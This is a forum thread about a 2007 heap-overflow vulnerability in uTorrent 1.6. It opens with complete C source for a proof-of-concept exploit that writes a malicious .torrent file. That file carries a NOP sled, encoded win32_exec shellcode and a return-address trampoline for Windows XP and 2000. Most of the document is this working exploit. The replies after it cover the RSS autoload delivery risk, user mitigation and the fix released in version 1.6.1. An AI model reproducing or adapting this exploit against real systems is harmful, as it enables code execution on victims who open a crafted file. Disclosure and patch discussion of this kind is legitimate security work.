/*
* This is a PoC exploit for uTorrent 1.6: it generates a crafted .torrent file
* (output.torrent) that triggers a heap overflow when the vulnerable client
* parses it, so the victim has to load the file (download, RSS autoload, ...).
*
* Author:
* defsec <defacedsecurity@hotmail.com>
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and w2k sp1-4 (the return address compiled into jmptosc below
* is the XP SP1 one; see the comment there for the Win2k replacement value --
* only an SP3/SP4 address is supplied).
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
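/*
 * Size in bytes of the crafted "announce" entry that main() writes at the
 * start of output.torrent: the 16-byte bencode prefix "d8:announce4864:"
 * followed by exactly 4864 bytes of string value.  The "4864" inside that
 * prefix and this constant must stay in step (16 + 4864 == 4880).
 */
#define NASIZE 4880

/* Scratch buffer main() assembles the crafted announce entry in. */
unsigned char nice_announce[NASIZE];

/*
 * Four bytes main() copies in immediately ahead of the shellcode (offset 84
 * of nice_announce).  On x86 they decode as xor eax,eax / xor ebx,ebx.
 */
static const unsigned char xorops[] = "\x33\xc0\x33\xdb";

/*
 * Payload as described by the generator line below: win32_exec, EXITFUNC
 * process, command "calc", 343 bytes, PexAlphaNum-encoded so that no 0x00
 * byte appears (the only restricted character).  The first bytes look like
 * the encoder's jmp/call/pop get-PC stub; the rest is the alphanumeric body.
 * Only the length and the absence of NUL bytes are relied on by main().
 */
// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
static const unsigned char shellcode[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
    "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
    "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
    "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
    "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
    "\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
    "\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
    "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
    "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
    "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
    "\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
    "\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
    "\x4e\x46\x43\x46\x42\x30\x5a";

/*
 * 20-byte trampoline that main() places at offset 4438 of nice_announce.
 *
 *   eb 04                jmp short +4, over the address that follows
 *   a7 2c c2 77          0x77c22ca7 little-endian.  Per the original note this
 *                        is a pop/pop/ret in msvcrt.dll on XP SP1.  It is
 *                        build-specific: 0x7801D07B is given for Win2k SP3/SP4,
 *                        and no value is supplied for Win2k SP1/SP2 even though
 *                        the file header claims those are supported.
 *   33 c0 b0 11 c1 e0 08 5b 5b 5b 2b d8 ff e3
 *                        appears to decode as eax = 0x1100; pop ebx three
 *                        times; ebx -= eax; jmp ebx -- i.e. a jump relative
 *                        to a value taken off the stack.  TODO(review):
 *                        confirm with a disassembler before depending on it.
 */
// msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
static const unsigned char jmptosc[] =
    "\xeb\x04"
    "\xa7\x2c\xc2\x77"
    "\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";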
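/*
 * Entry point.  Reads the .torrent named by argv[1], replaces everything in
 * front of its "7:comment" key with a crafted NASIZE-byte "announce" entry
 * (NOP sled + xorops + shellcode + jmptosc, see the globals above) and writes
 * the result to output.torrent in the current directory.
 *
 * Returns 0 when called without a file (usage is printed), EXIT_FAILURE on
 * any I/O, allocation or parse error, and 1337 -- the original's deliberate
 * success code, kept as-is -- once output.torrent has been written.
 *
 * NOTE(review): defects fixed relative to the original: the NOP-sled loop
 * wrote one byte past the end of nice_announce; the second strstr() result
 * was used without a NULL check; the buffer handed to strstr() was never
 * NUL-terminated; malloc()/fwrite()/fclose() results were ignored and nothing
 * was freed; error paths exited with status 0.
 */
int main(int argc, char *argv[])
{
    /* Where the payload fragments land inside nice_announce. */
    enum {
        XOROPS_OFF  = 84,    /* xorops, immediately followed by the shellcode */
        JMPTOSC_OFF = 4438   /* trampoline near the end of the sled */
    };
    /* bencode: dict, key "announce", then a 4864-byte string value.
     * 16 + 4864 must equal NASIZE. */
    static const char announce_hdr[] = "d8:announce4864:";
    const size_t hdr_len = sizeof(announce_hdr) - 1;
    const size_t xorops_len = sizeof(xorops) - 1;
    const size_t shellcode_len = sizeof(shellcode) - 1;
    const size_t jmptosc_len = sizeof(jmptosc) - 1;
    int rc = EXIT_FAILURE;
    FILE *in = NULL;
    FILE *out_fp = NULL;
    char *buf = NULL;
    long size = 0;
    const char *announce;
    const char *tail;
    size_t tail_len;
    size_t pos;

    if (argc < 2) {
        printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]"
               "\n\nUsage: %s <TorrentFile>\n",
               argc > 0 ? argv[0] : "exploit");
        return 0;
    }

    /* ---- slurp the input torrent ---- */
    in = fopen(argv[1], "rb");
    if (in == NULL) {
        fputs("File error", stderr);
        goto cleanup;
    }
    if (fseek(in, 0, SEEK_END) != 0 || (size = ftell(in)) <= 0) {
        fputs("File error", stderr);
        goto cleanup;
    }
    rewind(in);
    /* One extra byte so the buffer can be NUL-terminated for strstr(). */
    buf = malloc((size_t)size + 1);
    if (buf == NULL) {
        fputs("Memory error", stderr);
        goto cleanup;
    }
    if (fread(buf, 1, (size_t)size, in) != (size_t)size) {
        fputs("Reading error", stderr);
        goto cleanup;
    }
    buf[size] = '\0';
    fclose(in);
    in = NULL;

    /* ---- locate the span to replace ----
     * Everything from the start of the file up to the "7:comment" key that
     * follows the announce / announce-list is thrown away.  strstr() stops at
     * the first NUL byte, so only the leading text of the file is searched;
     * that is enough as long as the comment key precedes the binary "pieces"
     * data, which is the layout this generator was written for. */
    announce = strstr(buf, "announce");
    if (announce == NULL) {
        printf("\ninvalid torrent file");
        goto cleanup;
    }
    tail = strstr(announce, "7:comment");
    if (tail == NULL) {
        printf("\ninvalid torrent file (no 7:comment key after announce)");
        goto cleanup;
    }
    tail_len = (size_t)((buf + size) - tail);

    /* ---- build the crafted announce entry ---- */
    if (hdr_len > XOROPS_OFF ||
        XOROPS_OFF + xorops_len + shellcode_len > JMPTOSC_OFF ||
        JMPTOSC_OFF + jmptosc_len > NASIZE) {
        fputs("Payload does not fit the announce buffer", stderr);
        goto cleanup;
    }
    memcpy(nice_announce, announce_hdr, hdr_len);
    /* NOP sled over the whole value (indices hdr_len .. NASIZE-1). */
    memset(nice_announce + hdr_len, 0x90, NASIZE - hdr_len);
    pos = XOROPS_OFF;
    memcpy(nice_announce + pos, xorops, xorops_len);
    pos += xorops_len;
    memcpy(nice_announce + pos, shellcode, shellcode_len);
    memcpy(nice_announce + JMPTOSC_OFF, jmptosc, jmptosc_len);

    /* ---- emit crafted header followed by the untouched tail ---- */
    out_fp = fopen("output.torrent", "wb");
    if (out_fp == NULL) {
        fputs("File error", stderr);
        goto cleanup;
    }
    if (fwrite(nice_announce, 1, NASIZE, out_fp) != (size_t)NASIZE ||
        fwrite(tail, 1, tail_len, out_fp) != tail_len) {
        fputs("Write error", stderr);
        goto cleanup;
    }
    /* fclose() flushes; a failure here means output.torrent is incomplete. */
    if (fclose(out_fp) != 0) {
        out_fp = NULL;
        fputs("Write error", stderr);
        goto cleanup;
    }
    out_fp = NULL;
    rc = 1337; /* :) -- the original's success code */

cleanup:
    if (out_fp != NULL) {
        fclose(out_fp);
    }
    if (in != NULL) {
        fclose(in);
    }
    free(buf);
    return rc;
}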
Last edited by FLX (2007-02-12 16:32:41)
Yah, previously reported on the IRC channel ;\
Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with malformed bencode dictionaries. As far as reported here it is not something a remote peer can trigger over the wire, but a crafted file fetched from a web site or an RSS feed is still a remote delivery vector, so treat it as a client-side file-parsing bug rather than a non-issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so as to prevent µTorrent from autoloading malicious .torrent files).
Does it allow for arbitrary code execution? Does this one work on XP SP2?
"Koepi" (who first informed us on the channel) tested it on SP2, and supposedly, it did work. ^^inf^^ also confirmed it to be working. Not sure about arbitrary code execution though (note that the PoC above carries a win32_exec payload that launches calc, so a trigger that actually runs the payload would be code execution rather than just a crash).
This is an easy fix. Thanks for the report.
I already saw an arbitrary code execution and a local privilege escalation PoC where I'm from. But this is the only one that has been made public. Said to be working on Windows 2000, XP SP1 and XP SP2.
is it fixed already in last beta (483)?
Yes, ludde fixed it months ago in 483.
http://download.utorrent.com/beta/utorr … ld-483.exe for those who don't have the link.
This raises the question: why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?
edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page!
Last edited by Falcon4 (2007-02-13 18:33:09)
Latest Version: µTorrent 1.6.1 Stable build 488
Download: http://download.utorrent.com/1.6.1/utorrent.exe
Changelog: http://download.utorrent.com/1.6.1/utorrent-1.6.1.txt
I understand that. <_<
This. There used to be a beta download there. It's a bitch to scour the forums for that one topic with the download link in it when I want to grab the beta... v.v
Oh my post wasn't actually a response so much as it was an update
I'm not sure why it's not on the front page yet, but I guess they're waiting to update the automatic update server. Or something.
I see... sorry.
But yeah... it's bugged me for a long time that the beta was never added to the download page.
Dunno, I kinda prefer that betas are linked to from the forum anyway -- it kinda encourages people to visit the forum and report bugs should any pop up.
Most betas usually were, but b483 was intended to be with the webui only.
I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\
Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*
Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno.
1.6.1 already came out <_< it'll be on the main page later
I... did... sorta... post... a link... up above.
Wull yeah but.
1.6.1 is still not on the download page : http://www.utorrent.com/download.php
There is also not a single word about the exploit on the front page.
Last edited by xerces8 (2007-02-14 02:44:38)
Firon said "Later" .
...
Thank the new guy in charge for that delay!
Bram Cohen
BitTorrent™ Inc.
Edit: I talk about the downloadpage since yesterday!
Last edited by µtorrent-Guest (2007-02-14 10:45:51)
What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?
Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix?
Beta 483 wasn't vulnerable to the issue, and it was released last year. Ludde actually fixed it unintentionally when some of that code was rewritten, so at the time nobody knew there was a vulnerability there in the first place.